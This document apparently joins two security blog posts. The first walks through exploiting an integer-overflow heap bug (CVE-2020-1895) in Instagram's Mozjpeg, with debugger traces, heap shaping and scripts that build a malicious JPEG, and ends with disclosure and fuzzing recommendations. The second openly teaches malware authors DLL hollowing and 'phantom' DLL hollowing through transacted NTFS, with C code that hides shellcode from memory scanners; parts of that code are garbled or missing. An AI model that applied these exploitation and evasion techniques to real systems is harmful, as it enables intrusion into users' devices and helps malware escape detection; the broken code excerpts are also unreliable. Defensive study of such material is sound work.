(gdb) jeinfo 0x72a63eaa70  <========= main
parent    address         size    
arena     0x72c808fc00    -       
chunk     0x72a6200000    0x200000
run       0x72a63e9000    0x5000  <========= our large targeted run!

Heap-shaping strategy

Our goal is to exploit an integer overflow that leads to a heap buffer overflow.

Exploiting these kinds of bugs is all about precise positioning of heap objects. We want to force certain objects to be allocated in specific locations in the heap, so we can form useful adjacencies for memory corruption.

To achieve this adjacency, we need to shape the heap so our exploitable object is allocated just before our targeted object.

Unfortunately, we have no control over free operations. According to Mozjpeg documentation, most of the data is allocated “per image” and is freed by jpeg_finish_decompress, or jpeg_abort.” This means that all of the free operations occur at the end of the decompression process using jpeg_finish_decompress, or jpeg_abort which is only called after we have finished overriding memory with our wildcopy loop.

However, in our case we don’t need any free operations because we have control over a function which performs a raw malloc with a size that we control. This gives us the power to choose where we want to place our overflowed buffer on the heap.

We want to position the object containing our overflowed buffer just before the large (0x5000) object containing the main/post/coef data structures that performs a call to function pointers.

Figure 7. Visualizing Jemalloc objects on the heap.  

Therefore, the simplest way for us to exploit this is to shape the heap so that the overflowed buffer is allocated right before our targeted large (0x5000) object, and then (use the bug to) overwrite the main/post/coef virtual functions address to our own. This gives us full control of the virtual table that redirects any method to any code address.

We know that the targeted object is always at the same (0x5000) large size, and because Jemalloc allocates large sizes from top to bottom, the only thing we need is to place our overflow objects in the bottom of the same chunk where the large target object is located.

Jemalloc’s chunk size is 2MB in our tested Android version.

The distance (in bytes) between the objects doesn’t matter because we have a wildcopy loop that can copy enormous amounts of data line by line (we control the size of the line). The data that is copied is ultimately larger than 2MB, so we know for sure that we will end up corrupting every object on the chunk that is located after our overflow object.

As we don’t have any control over free operations, we cannot create holes that our object will fall to. (A hole is one or more free places in a run.) Instead, we tried looking for holes that happen anyways as part of the image decompression flow, looking for sizes that repeat every time during debugging.

Let’s use the shadow tool to examine our chunk’s layout in memory:

(gdb) jechunk 0x72a6200000
This chunk belongs to the arena at 0x72c808fc00.

addr            info                  size       usage  
0x72a6200000    headers               0xd000     -      
0x72a620d000    large run             0x1b000    -            
0x72a6227000    large run             0x1b000    -      
0x72a6228000    small run (0x180)     0x3000     10/32  
0x72a622b000    small run (0x200)     0x1000     8/8    
0x72a638f000    small run (0x80)      0x1000     6/32   
0x72a6390000    small run (0x60)      0x3000     12/128 
0x72a6393000    small run (0xc00)     0x3000     4/4    
0x72a6396000    small run (0xc00)     0x3000     4/4    
0x72a6399000    small run (0x200)     0x1000     2/8    
0x72a639a000    small run (0xe0)      0x7000     6/128  <===== The run we want to hit!!!
0x72a63a1000    small run (0x1000)    0x1000     1/1    
0x72a63a2000    small run (0x1000)    0x1000     1/1    
0x72a63a3000    small run (0x1000)    0x1000     1/1    
0x72a63a4000    small run (0x1000)    0x1000     1/1    
0x72a63a5000    large run    0x5000        -         <===== Large targeted object!!! 

We are looking for runs with holes, and those runs must be before the large targeted buffer we want to override. A run can be used to host either one large allocation, or multiple small/medium allocations. 

Runs that host small allocations are divided into regions. A region is synonymous to a small allocation. Each small run hosts regions of just one size. In other words, a small run is associated with exactly one region size class.

Runs that host medium allocations are also divided into regions, but as the name indicates, they are bigger than the small allocations. Therefore, the runs that host medium allocations are divided into bigger size class regions that take up more space.

For example, a small run of size class 0xe0 is divided into 128 regions:

0x72a639a000    small run (0xe0)      0x7000     6/128  

Medium runs of size class 0x200 are divided into 8 regions: 

0x72a6399000    small run (0x200)     0x1000     2/8

Small allocations are the most common allocations, and most likely the ones you need to manipulate/control/overflow. As small allocations are divided into more regions, they are easier to control as it is less likely that other threads will allocate all of the remaining regions.

Therefore, to cause the overflowable object to be allocated before the large targeted object, we use our Python script from (Wild Copy Exploitation paragraph). The script helps us generate the dimensions that will cause the malloc to allocate our overflowable object in our targeted small size class.

We constructed a new JPEG image with the sizes to trigger allocation to the small size class of (0xe0) objects and set a breakpoint on libjepgutils_moz.so+0x918.

(gdb) x/20i $pc
=> 0x7e47ead7dc:    bl    0x7e47eae660 <__wrap_malloc@plt>
   0x7e47ead7e0:    mov    x23, x0

We are at the point of one command before our controlled malloc, and X0 holds the size that we wish to allocate:

(gdb) info registers x0
x0             0xe0        224

We continue one command forward and again examine the X0 register which now holds the result that we got from the calling the malloc:

(gdb) x/20i $pc
=> 0x7e4cf987e0:    mov    x23, x0
(gdb) info registers x0
x0             0x72a639ac40    492415069248

The address we got back from malloc is the address of our overflowable object (0x72a639ac40). Let’s examine its location on the heap using the jeinfo method from the shadow framework.

(gdb) jeinfo 0x72a639ac40
parent    address         size    
arena     0x72c808fc00    -       
chunk     0x72a6200000    0x200000
run       0x72a639a000    0x7000  
region    0x72a639ac40    0xe0

We are at the same chunk (0x72a6200000) as our targeted large object! Let’s look at the chunk’s layout again to make sure that our overflowable buffer is at the small size class (0xe0) that we aimed to hit.

(gdb) jechunk 0x72a6200000
This chunk belongs to the arena at 0x72c808fc00.
0x72a639a000    small run (0xe0)      0x7000     7/128  <-----hit!!!
0x72a63a1000    small run (0x1000)    0x1000     1/1    
0x72a63a2000    small run (0x1000)    0x1000     1/1    
0x72a63a3000    small run (0x1000)    0x1000     1/1    
0x72a63a4000    small run (0x1000)    0x1000     1/1    
0x72a63a5000    large run             0x5000     -     <------Large targeted object!!!  

Yesss! Now let’s continue the execution and see what happens when we overwrite the large targeted object.

(gdb) c
[New Thread 29767.30462]
Thread 93 "IgExecutor #19" received signal SIGBUS, Bus error.
0xff9d9588ff989083 in ?? ()

BOOM! Exactly what we were aiming for–the crash occurred while trying to load a function address through the function pointer for our corrupted data from the overflowable object. We got a Bus error (also known as SIGBUS and is usually signal 10) which occurs when a process is trying to access memory that the CPU cannot physically address. In other words, the memory the program tried to access is not a valid memory address because it contains the data from our image that replaced the real function pointer and led to this crash!

Putting everything together

We have a controlled function call. All that is missing for a reliable exploit is to redirect execution to a convenient gadget to stack pivot, and then build an ROP stack.

Now we need to put everything together and (1) construct an image with malformed dimensions that (2) triggers the bug, which then(3)  leads to a copy of our controlled payload that  (4) diverts the execution to an address that we control.

We need to generate a corrupted JPEG with our controlled data. Therefore, our next step was to determine exactly what image formats are supported by the Mozjpeg platform. We can figure that out from that piece of code below. out_color_space represents the amount of bits per pixel that is determined according to the image format. 

switch (cinfo->out_color_space) {
    cinfo->out_color_components = 1;
  case JCS_RGB:
  case JCS_EXT_RGB:
  case JCS_EXT_RGBX:
  case JCS_EXT_BGR:
  case JCS_EXT_BGRX:
  case JCS_EXT_XBGR:
  case JCS_EXT_XRGB:
  case JCS_EXT_RGBA:
  case JCS_EXT_BGRA: 
  case JCS_EXT_ABGR: 
  case JCS_EXT_ARGB:
    cinfo->out_color_components = rgb_pixelsize[cinfo->out_color_space];
  case JCS_YCbCr:
  case JCS_RGB565:
      cinfo->out_color_components = 3; 
  case JCS_CMYK:
  case JCS_YCCK:
      cinfo->out_color_components = 4;
    cinfo->out_color_components = cinfo->num_components;

We used a simple Python library called PIL to construct a RGB BMP file. We chose the RGB format that is familiar and known to us and we filled it with “AAA” as payload. This file is the base image format that we use to create our malicious compressed JPEG.

from PIL import Image
 img = Image.new('RGB', (100, 100)) 
pixels = img.load() 

for i in range(img.size[0]):  
    for j in range(img.size[1]):
        pixels[i,j] = (0x41, 0x41, 0x41) 

We then used the cjpeg tool from the Mozjpeg project to compress our bmp file into a JPEG file.

./cjpeg -rgb -quality 100 -fastcrush -notrellis -notrellis-dc -noovershoot -outfile rgb100.jpg rgb100.bmp

Next, we tested the compressed output file to test our assumptions. We know that the RGB format is 3 bytes per pixel.

We verified that the code does set cinfo->out_color_space = 0x2 (JCS_RGB) correctly. However, when we checked our controlled allocation, we saw that the height and width arguments as part of the integer overflow are still multiplied by out_color_components which is equal to 4, even though we started with a RGB format using a 3×8-bits per pixel. It seems that Mozjpeg prefers to convert our image to a 4×8-bits per pixel format.

We then turned to a 4×8-bit pixels format that is supported by the Mozjpeg platform, and the CMYK format met the criteria. We used the CMYK format as a base image to give us full control over all 4 bytes. We filled the image with “AAAA” as the payload.

We compressed it to a JPEG format and added the dimensions that trigger the bug. To our delight, we got the following crash!

Thread 93 "IgExecutor #19" received signal SIGBUS, Bus error.
0xff414141ff414141 in ?? ()

However, we got a weird 0xFF bytes as part of our controlled address even though we constructed a 4×8 bits per pixel image, and the 4th component is not part of our payload.

What does this 0xFF mean? Transparency!

Bitmap file formats that support transparency include GIFPNGBMPTIFF, and JPEG 2000, through either a transparent color or an alpha channel.

Bitmap-based images are technically characterized by the width and height of the image in pixels and by the number of bits per pixel. 

Therefore, we decided to construct a RGBA BMP format file with our controlled alpha channel (0x61) using the PIL library.

from PIL import Image
 img = Image.new('RGBA', (100, 100))
 pixels = img.load()
 for i in range(img.size[0]):  
     for j in range(img.size[1]):
         pixels[i,j] = (0x41, 0x41, 0x41,0x61)

Surprisingly, we got the same results as when we used the CMYK malicious JPEG. We still we got an alpha channel of  0xFF as part of our controlled address even though we used a RGBA format as the base for the compressed JPEG, and we had our own alpha channel from the file with the value (0x61). How did this happen? Let’s go back to the code and understand the reason for that odd behavior.

We found the answer in this little piece of code below:

Figure 8. Setting cinfo->out_color_space to RGBA(0xC) as seen in the IDA disassembly snippet. 

We found that Instagram decided to add their own const value after jpeg_read_header finished and before calling jpeg_start_decompress.

We used the RGB format from the first test and we saw that Mozjpeg does correctly set cinfo->out_color_space = 0x2 (JCS_RGB). However, from Instagram’s code (see Figure 3) we can see that this value is overwritten by a const value of 0xc which represents the (JCS_EXT_RGBA) format.

This also explains the weird 0xFF alpha channel that we got even though we used a 3×8-bits per pixel RGB object.

After diving further into the code, we saw that value of the alpha channel (0xFF) is hard coded as a const value. When Instagram sets the cinfo->out_color_space = 0xc to point to the (JCS_EXT_RGBA) format, the code copies 3 bytes from our input base file, and then the 4th byte copied is always the hardcoded alpha channel value.

#ifdef RGB_ALPHA
      outptr[RGB_ALPHA] = 0xFF;

Now that we put everything together, we came to the conclusion that no matter what image format is used for the base of the compressed JPEG, Instagram always converts the output file to a RGBA format file. 

The fact that 0xff is always added to the beginning means we could have achieved our goal in a big-endian environment.

Little-endian systems store the least-significant byte of a word at the smallest memory address.  Because we’re dealing with a little-endian system, the alpha channel value is always written as the MSB (Most Significant Byte) of our controlled address. As we’re trying to exploit the bug in user mode, and the (0xFF) value belongs to the kernel address space, it foils our plans.

Is exploitation possible?

We lost our quick win. One lesson we can learn from this is that real life is not a CTF game, and sometimes one crucial const value set by a developer can ruin everything from an exploitation perspective.

Let’s recall the content from the main website of the Mozilla foundation about Mozjpeg:

“Mozjpeg’s sole purpose is to reduce the size of JPEG files that are served up on the web.”

From what we saw, Instagram will increase memory usage by 25% for each image we want to upload! That’s about 100 million per day!

To quote one sentence from a lecture that Halvar Flake gave in the last OffisiveCon:

“The only person in computing that is paid to actually understand the system from top to bottom is the attacker! Everybody else usually gets paid to do their parts.”

At this point, Facebook already patched the vulnerability so we stopped our exploitation effort even though we weren’t quite finished with it. 

We still have 3 bytes overwrite, and in theory we could invest more time to find more useful primitives that could help us to exploit this bug. However, we decided we did enough and we have publicized the important point that we wanted to convey.

The Mozjpeg project on Instagram is just the tip of the iceberg when talking about Mozjpeg. The Mozilla-based project is still widely used in many other projects over the web, in particular Firefox, and it is also widely used as part of different popular open-source projects such as sharp and libvips projects (on the Github platform alone, they have more than 20k stars combined).

Conclusion & Recommendations

Our blog post describes how image parsing code, as a third party library, ends up being the weakest point of Instagram’s large system. Fuzzing the exposed code turned up some new vulnerabilities which have since been fixed. It is likely that, given enough effort, one of these vulnerabilities can be exploited for RCE in a zero-click attack scenario. Unfortunately, it is also likely that other bugs remain or will be introduced in the future. As such, continuous fuzz-testing of this and similar media format parsing code, both in operating system libraries and third party libraries, is absolutely necessary. We also recommend reducing the attack surface by restricting the receiver to a small number of supported image formats.

This field has been researched a lot by various appreciated independent security researchers as well as nationally-sponsored security researchers. Media format parsing remains an important issue. See also other researcher and vendor advisories:

Facebook’s advisory described this vulnerability as an “Integer Overflow leading to Heap Buffer Overflow – large heap overflow could occur in Instagram for Android when attempting to upload an image with specially crafted dimensions. This affects versions prior to” 

We at Check Point responsibly disclosed the vulnerability to Facebook, who released a patch on (February 10, 2020). Facebook acknowledged the vulnerability and assigned it CVE-2020-1895. The bug was tested for both 32bit & 64bit versions of the Instagram app.

Many thanks to my colleagues Eyal Itkin (​@EyalItkin​), Oleg Ilushin, Omri Herscovici (@omriher​) for their help in this research.

Masking Malicious Memory Artifacts – Part I: Phantom DLL Hollowing

Original text by Forrest Orr


I’ve written this article with the intention of improving the skill of the reader as relating to the topic of memory stealth when designing malware. First by detailing a technique I term DLL hollowing which has not yet gained widespread recognition among attackers, and second by introducing the reader to one of my own variations of this technique which I call phantom DLL hollowing (the PoC for which can be found on Github).

This will be the first post in a series on malware forensics and bypassing defensive scanners. It was written with the assumption that the reader understands the basics of Windows internals and malware design.

Legitimate memory allocation

In order to understand how defenders are able to pick up on malicious memory artifacts with minimal false positives using point-in-time memory scanners such as Get-InjectedThread and malfind it is essential for one to understand what constitutes “normal” memory allocation and how malicious allocation deviates from this norm. For our purposes, typical process memory can be broken up into 3 different categories:

  • Private memory – not to be confused with memory that is un-shareable with other processes. All memory allocated via NTDLL.DLL!NtAllocateVirtualMemory falls into this category (this includes heap and stack memory).
  • Mapped memory – mapped views of sections which may or may not be created from files on disk. This does not include PE files mapped from sections created with the SEC_IMAGE flag.
  • Image memory – mapped views of sections created with the SEC_IMAGE flag from PE files on disk. This is distinct from mapped memory. Although image memory is technically a mapped view of a file on disk just as mapped memory may be, they are distinctively different categories of memory.

These categories directly correspond to the Type field in the MEMORY_BASIC_INFORMATION structure. This structure is strictly a usermode concept, and is not stored independently but rather is populated using the kernel mode VAD, PTE and section objects associated with the specified process. On a deeper level the key difference between private and shared (mapped/image) memory is that shared memory is derived from section objects, a construct specifically designed to allow memory to be shared between processes. With this being said, the term “private memory” can be a confusing terminology in that it implies all sections are shared between processes, which is not the case. Sections and their related mapped memory may also be private although they will not technically be “private memory,” as this term is typically used to refer to all memory which is never shared (not derived from a section). The distinction between mapped and image memory stems from the control area of their foundational section object.

In order to give the clearest possible picture of what constitutes legitimate memory allocation I wrote a memory scanner (the PoC for which can be found on Github) which uses the characteristics of the MEMORY_BASIC_INFORMATION structure returned by KERNEL32.DLL!VirtualQuery to statistically calculate the most common permission attributes of each of the three aforementioned memory types across all accessible processes. In the screenshot below I’ve executed this scanner on an unadulterated Windows 8 VM.

Figure 1 — Memory attribute statistics on a Windows 8 VM

Understanding these statistics is not difficult. The majority of private memory is +RW, consistent with its usage in stack and heap allocation. Mapped memory is largely readonly, an aspect which is also intuitive considering that the primary usage of such memory is to map existing .db, .mui and .dat files from disk into memory for the application to read. Most notably from the perspective of a malware writer is that executable memory is almost exclusively the domain of image mappings. In particular +RX regions (as opposed to +RWX) which correspond to the .text sections of DLL modules loaded into active processes.

Figure 2 — x64dbg enumeration of Windows Explorer image memory

In Figure 2, taken from the memory map of an explorer.exe process, image memory is shown split into multiple separate regions. Those corresponding to the PE header and subsequent sections, along with a predictable set of permissions (+RX for .text, +RW for .data, +R for .rsrc and so forth). The Info field is actually an abstraction of x64dbg and not a characteristic of the memory itself: x64dbg has walked the PEB loaded module list searching for an entry with a base address that matches the region base, and then set the Info for its PE headers to the module name, and each subsequent region within the map has had its Info set to its corresponding IMAGE_SECTION_HEADER.Name, as determined by calculating which regions correspond to each mapped image base + IMAGE_SECTION_HEADER.VirtualAddress

Classic malware memory allocation

Malware writers have a limited set of tools in their arsenal to allocate executable memory for their code. This operation is however essential to process injection, process hollowing and packers/crypters. In brief, the classic technique for any form of malicious code allocation involved using NTDLL.DLL!NtAllocateVirtualMemory to allocate a block of +RWX permission memory and then writing either a shellcode or full PE into it, depending on the genre of attack.

uint8_t* pShellcodeMemory = (uint8_t*)VirtualAlloc(





memcpy(pShellcodeMemory, Shellcode, dwShellcodeSize);








Later this technique evolved as both attackers and defenders increased in sophistication, leading malware writers to use a combination of NTDLL.DLL!NtAllocateVirtualMemory with +RW permissions and NTDLL.DLL!NtProtectVirtualMemory after the malicious code had been written to the region to set it to +RX before execution. In the case of process hollowing using a full PE rather than a shellcode, attackers begun correctly modifying the permissions of +RW memory they allocated for the PE to reflect the permission characteristics of the PE on a per-section basis. The benefit of this was twofold: no +RWX memory was allocated (which is suspicious in and of itself) and the VAD entry for the malicious region would still read as +RW even after the permissions had been modified, further thwarting memory forensics.

uint8_t* pShellcodeMemory = (uint8_t*)VirtualAlloc(





memcpy(pShellcodeMemory, Shellcode, dwShellcodeSize);













More recently, attackers have transitioned to an approach of utilizing sections for their malicious code execution. This is achieved by first creating a section from the page file which will hold the malicious code. Next the section is mapped to the local process (and optionally a remote one as well) and directly modified. Changes to the local view of the section will also cause remote views to be modified as well, thus bypassing the need for APIs such as KERNEL32.DLL!WriteProcessMemory to write malicious code into remote process address space.

LARGE_INTEGER SectionMaxSize = { 0,0 };


SectionMaxSize.LowPart = dwShellcodeSize;

NtStatus = NtCreateSection(



NULL, &SectionMaxSize,




if (NT_SUCCESS(NtStatus)) {

NtStatus = NtMapViewOfSection(



(void **)&pShellcodeMemory,






if (NT_SUCCESS(NtStatus)) {

memcpy(pShellcodeMemory, Shellcode, dwShellcodeSize);










While this has the benefit of being (at present) slightly less common than direct virtual memory allocation with NTDLL.DLL!NtAllocateVirtualMemory, it creates similar malicious memory artifacts for defenders to look out for. One key difference between the two methods is that NTDLL.DLL!NtAllocateVirtualMemory will allocate private memory, whereas mapped section views will allocate mapped memory (shared section memory with a data control area).

While a malware writer may avoid the use of suspicious (and potentially monitored) APIs such as NTDLL.DLL!NtAllocateVirtualMemory and NTDLL.DLL!NtProtectVirtualMemory the end result in memory is ultimately quite similar with the key difference being the distinction between a MEM_MAPPED and MEM_PRIVATE memory type assigned to the shellcode memory.

DLL hollowing

With these concepts in mind, it’s clear that masking malware in memory means utilizing +RX image memory, in particular the .text section of a mapped image view. The primary caveat to this is that such memory cannot be directly allocated, nor can existing memory be modified to mimic these attributes. Only the PTE which stores the active page permissions is mutable, while the VAD and section object control area which mark the region as image memory and associate it to its underlying DLL on disk are immutable. For this reason, properly implementing a DLL hollowing attack implies infection of a mapped view generated from a real DLL file on disk. Such DLL files should have a .text section with a IMAGE_SECTION_HEADER.Misc.VirtualSize greater than or equal to the size of the shellcode being implanted, and should not yet be loaded into the target process as this implies their modification could result in a crash.

GetSystemDirectoryW(SearchFilePath, MAX_PATH);

wcscat_s(SearchFilePath, MAX_PATH, L»\\*.dll»);

if ((hFind = FindFirstFileW(SearchFilePath, &Wfd)) != INVALID_HANDLE_VALUE) {

do {

if (GetModuleHandleW(Wfd.cFileName) == nullptr) {



while (!bMapped && FindNextFileW(hFind, &Wfd));



In this code snippet I’ve enumerated files with a .dll extension in system32 and am ensuring they are not already loaded into my process using KERNEL32.DLL!GetModuleFileNameW, which walks the PEB loaded modules list and returns their base address (the same thing as their module handle) if a name match is found. In order to create a section from the image I first need to open a handle to it. I’ll discuss TxF in the next section, but for the sake of this code walkthrough we can assume KERNEL.DLL!CreateFileW is used. Upon opening this handle I can read the contents of the PE and validate its headers, particularly its IMAGE_SECTION_HEADER.Misc.VirtualSize field which indicates a sufficient size for my shellcode.

uint32_t dwFileSize = GetFileSize(hFile, nullptr);

uint32_t dwBytesRead = 0;

pFileBuf = new uint8_t[dwFileSize];

if (ReadFile(hFile, pFileBuf, dwFileSize, (PDWORD)& dwBytesRead, nullptr)) {

SetFilePointer(hFile, 0, nullptr, FILE_BEGIN);


IMAGE_NT_HEADERS* pNtHdrs = (IMAGE_NT_HEADERS*)(pFileBuf + pDosHdr->e_lfanew);

IMAGE_SECTION_HEADER* pSectHdrs = (IMAGE_SECTION_HEADER*)((uint8_t*)& pNtHdrs->OptionalHeader + sizeof(IMAGE_OPTIONAL_HEADER));

if (pNtHdrs->OptionalHeader.Magic == IMAGE_NT_OPTIONAL_HDR_MAGIC) {

if (dwReqBufSize < pNtHdrs->OptionalHeader.SizeOfImage && (_stricmp((char*)pSectHdrs->Name, «.text») == 0 && dwReqBufSize < pSectHdrs->Misc.VirtualSize))




When a valid PE is found a section can be created from its file handle, and a view of it mapped to the local process memory space.

HANDLE hSection = nullptr;

NtStatus = NtCreateSection(&hSection, SECTION_ALL_ACCESS, nullptr, nullptr, PAGE_READONLY, SEC_IMAGE, hFile);

if (NT_SUCCESS(NtStatus)) {

    *pqwMapBufSize = 0;

    NtStatus = NtMapViewOfSection(hSection, GetCurrentProcess(), (void**)ppMapBuf, 0, 0, nullptr, (PSIZE_T)pqwMapBufSize, 1, 0, PAGE_READONLY);



The unique characteristic essential to this technique is the use of the SEC_IMAGE flag to NTDLL.DLL!NtCreateSection. When this flag is used, the initial permissions parameter is ignored (all mapped images end up with an initial allocation permission of +RWXC). Also worth noting is that the PE itself is validated by NTDLL.DLL!NtCreateSection at this stage, and if it is invalid in any way NTDLL.DLL!NtCreateSection will fail (typically with error 0xc0000005).

Finally, the region of memory corresponding to the .text section in the mapped view can be modified and implanted with the shellcode.

*ppMappedCode = *ppMapBuf + pSectHdrs->VirtualAddress + dwCodeRva;

if (!bTxF) {

uint32_t dwOldProtect = 0;

if (VirtualProtect(*ppMappedCode, dwReqBufSize, PAGE_READWRITE, (PDWORD)& dwOldProtect)) {

memcpy(*ppMappedCode, pCodeBuf, dwReqBufSize);

if (VirtualProtect(*ppMappedCode, dwReqBufSize, dwOldProtect, (PDWORD)& dwOldProtect)) {

bMapped = true;




else {

bMapped = true;


Once the image section has been generated and a view of it has been mapped into the process memory space, it will share many characteristics in common with a module legitimately loaded via NTDLL.DLL!LdrLoadDll but with several key differences:

  • Relocations will be applied, but imports will not yet be resolved.
  • The module will not have been added to the loaded modules list in usermode process memory.

The loaded modules list is referenced in the LoaderData field of the PEB:

typedef struct _PEB {

BOOLEAN InheritedAddressSpace; // 0x0

BOOLEAN ReadImageFileExecOptions; // 0x1

BOOLEAN BeingDebugged; // 0x2

BOOLEAN Spare; // 0x3

#ifdef _WIN64

uint8_t Padding1[4];


HANDLE Mutant; // 0x4 / 0x8

void * ImageBase; // 0x8 / 0x10

PPEB_LDR_DATA LoaderData; // 0xC / 0x18


There are three such lists, all representing the same modules in a different ordering. 

typedef struct _LDR_MODULE {

LIST_ENTRY InLoadOrderModuleList;

LIST_ENTRY InMemoryOrderModuleList;

LIST_ENTRY InInitializationOrderModuleList;

void * BaseAddress;

void * EntryPoint;

ULONG SizeOfImage;



ULONG Flags;

SHORT LoadCount;

SHORT TlsIndex;

LIST_ENTRY HashTableEntry;

ULONG TimeDateStamp;


typedef struct _PEB_LDR_DATA {

ULONG Length;

ULONG Initialized;

void * SsHandle;

LIST_ENTRY InLoadOrderModuleList;

LIST_ENTRY InMemoryOrderModuleList;

LIST_ENTRY InInitializationOrderModuleList;


It’s important to note that to avoid leaving suspicious memory artifacts behind, an attacker should add their module to all three of the lists. In Figure 3 (shown below) I’ve executed my hollower PoC without modifying the loaded modules list in the PEB to reflect the addition of the selected hollowing module (aadauthhelper.dll).

Figure 3 – 64-bit DLL hollower PoC embedding a message box shellcode into aadauthhelper.dll

Using x64dbg to view the memory allocated for the aadauthhelper.dll base at 0x00007ffd326a0000 we can see that despite its IMG tag, it looks distinctly different from the other IMG module memory surrounding it.

Figure 4 – Artificially mapped aadauthhelper.dll orphaned from its loaded modules list entry

This is because the association between a region of image memory and its module is inferred rather than explicitly recorded. In this case, x64dbg is scanning the aforementioned PEB loaded modules list for an entry with a BaseAddress of 0x00007ffd326a0000 and upon not finding one, does not associate a name with the region or associate its subsections with the sections from its PE header. Upon adding aadauthhelper.dll to the loaded modules lists, x64dbg shows the region as if it corresponded to a legitimately loaded module.

Figure 5 – Mapped view of aadauthhelper.dll linked to the loaded modules list

Comparing this artificial module (implanted with shellcode) with a legitimately loaded aadauthhelper.dll we can see there is no difference from the perspective of a memory scanner. Only once we view the .text sections in memory and compare them between the legitimate and hollowed versions of aadauthhelper.dll can we see the difference.

Phantom hollowing

DLL hollowing does in and of itself represent a major leap forward in malware design. Notably though, the +RX characteristic of the .text section conventionally forces the attacker into a position of manually modifying this region to be +RW using an API such as NTDLL.DLL!NtProtectVirtualMemory after it has been mapped, writing their shellcode to it and then switching it back to +RX prior to execution. This sets off two different alarms for a sophisticated defender to pick up on:

  1. Modification of the permissions of a PTE associated with image memory after it has already been mapped using an API such as NTDLL.DLL!NtProtectVirtualMemory.
  2. A new private view of the modified image section being created within the afflicted process memory space.

While the first alarm is self-explanatory the second merits further consideration. It may be noted in Figure 2 that the initial allocation permissions of all image related memory is +RWXC, or PAGE_EXECUTE_WRITECOPY. By default, mapped views of image sections created from DLLs are shared as a memory optimization by Windows. For example, only one copy of kernel32.dll will reside in physical memory but will be shared throughout the virtual address space of every process via a shared section object. Once the mapped view of a shared section is modified, a unique (modified) copy of it will be privately stored within the address space of the process which modified it. This characteristic provides a valuable artifact for defenders who aim to identify modified regions of image memory without relying on runtime interception of modifications to the PTE.

Figure 6 — VMMap of unmodified aadauthhelper.dll

In Figure 6 above, it can be clearly seen that the substantial majority of aadauthhelper.dll in memory is shared, as is typical of mapped image memory. Notably though, two regions of the image address space (corresponding to the .data and .didat sections) have two private pages associated with them. This is because these sections are writable, and whenever a previously unmodified page within their regions is modified it will be made private on a per-page basis.

Figure 7 — VMMap of hollowed aadauthhelper.dll

After allowing my hollower to change the protections of the .text section and infect a region with my shellcode, 4K (the default size of a single page) within the .text sections is suddenly marked as private rather than shared. Notably, however many bytes of a shared region are modified (even if it is only one byte) the total size of the affected region will be rounded up to a multiple of the default page size. In this case, my shellcode was 784 bytes which was rounded up to 0x1000, and a full page within .text was made private despite a considerably smaller number of shellcode bytes being written.

Thankfully for us attackers, it is indeed possible to modify an image of a signed PE without changing its contents on disk, and prior to mapping a view of it into memory using transacted NTFS (TxF).

Figure 8 – TxF APIs

Originally designed to provide easy rollback functionality to installers, TxF was implemented in such a way by Microsoft that it allows for complete isolation of transacted data from external applications (including AntiVirus). Therefore if a malware writer opens a TxF file handle to a legitimate Microsoft signed PE file on disk, he can conspicuously use an API such as NTDLL.DLL!NtWriteFile to overwrite the contents of this PE while never causing the malware to be scanned when touching disk (as he has not truly modified the PE on disk). He then has a phantom file handle referencing a file object containing malware which can be used the same as a regular file handle would, with the key difference that it is backed by an unmodified and legitimate/signed file of his choice. As previously discussed, NTDLL.DLL!NtCreateSection consumes a file handle when called with SEC_IMAGE, and the resulting section may be mapped into memory using NTDLL.DLL!NtMapViewOfSection. To the great fortune of the malware writer, these may be transacted file handles, effectively providing him a means of creating phantom image sections.

The essence of phantom DLL hollowing is that an attacker can open a TxF handle to a Microsoft signed DLL file on disk, infect its .text section with his shellcode, and then generate a phantom section from this malware-implanted image and map a view of it to the address space of a process of his choice. The file object underlying the mapping will still point back to the legitimate Microsoft signed DLL on disk (which has not changed) however the view in memory will contain his shellcode hidden in its .text section with +RX permissions.

NtStatus = NtCreateTransaction(&hTransaction,










hFile = CreateFileTransactedW(FilePath,

GENERIC_WRITE | GENERIC_READ, // The permission to write to the DLL on disk is required even though we technically aren’t doing this.









memcpy(pFileBuf + pSectHdrs->PointerToRawData + dwCodeRva, pCodeBuf, dwReqBufSize);

if (WriteFile(hFile, pFileBuf, dwFileSize, (PDWORD)& dwBytesWritten, nullptr)) {

HANDLE hSection = nullptr;

NtStatus = NtCreateSection(&hSection, SECTION_ALL_ACCESS, nullptr, nullptr, PAGE_READONLY, SEC_IMAGE, hFile);

if (NT_SUCCESS(NtStatus)) {

*pqwMapBufSize = 0;

NtStatus = NtMapViewOfSection(hSection, GetCurrentProcess(), (void**)ppMapBuf, 0, 0, nullptr, (PSIZE_T)pqwMapBufSize, 1, 0, PAGE_READONLY);



Notably in the snippet above, rather than using the .text IMAGE_SECTION_HEADER.VirtualAddress to identify the infection address of my shellcode I am using IMAGE_SECTION_HEADER.PointerToRawData. This is due to the fact that although I am not writing any content to disk, the PE file is still technically physical in the sense that it has not yet been mapped in to memory. Most relevant in the side effects of this is the fact that the sections will begin at IMAGE_OPTIONAL_HEADER.FileAlignment offsets rather than IMAGE_OPTIONAL_HEADER.SectionAlignment offsets, the latter of which typically corresponds to the default page size.

The only drawback of phantom DLL hollowing is that even though we are not writing to the image we are hollowing on disk (which will typically be protected In System32 and unwritable without admin and UAC elevation) in order to use APIs such as NTDLL.DLL!NtWriteFile to write malware to phantom files, one must first open a handle to its underlying file on disk with write permissions. In the case of an attacker who does not have sufficient privileges to create their desired TxF handle, a solution is to simply copy a DLL from System32 to the malware’s application directory and open a writable handle to this copy. The path of this file is less stealthy to a human analyst, however from a program’s point of view the file is still a legitimate Microsoft signed DLL and such DLLs often exist in many directories outside of System32, making an automated detection without false positives much more difficult.

Another important consideration with phantom sections is that it is not safe to modify the .text section at an arbitrary offset. This is because a .text section within an image mapped to memory will look different from its equivalent file on disk, and because it may contain data directories whose modification will corrupt the PE. When relocations are applied to the PE, this will cause all of the absolute addresses within the file to be modified (re-based) to reflect the image base selected by the OS, due to ASLR. If shellcode is written to a region of code containing absolute address references, it will cause the shellcode to be corrupted when NTDLL.DLL!NtMapViewOfSection is called.

bool CheckRelocRange(uint8_t* pRelocBuf, uint32_t dwRelocBufSize, uint32_t dwStartRVA, uint32_t dwEndRVA) {


uint32_t dwRelocBufOffset, dwX;

bool bWithinRange = false;

for (pCurrentRelocBlock = (IMAGE_BASE_RELOCATION *)pRelocBuf, dwX = 0, dwRelocBufOffset = 0; pCurrentRelocBlock->SizeOfBlock; dwX++) {

uint32_t dwNumBlocks = ((pCurrentRelocBlock->SizeOfBlock — sizeof(IMAGE_BASE_RELOCATION)) / sizeof(uint16_t));

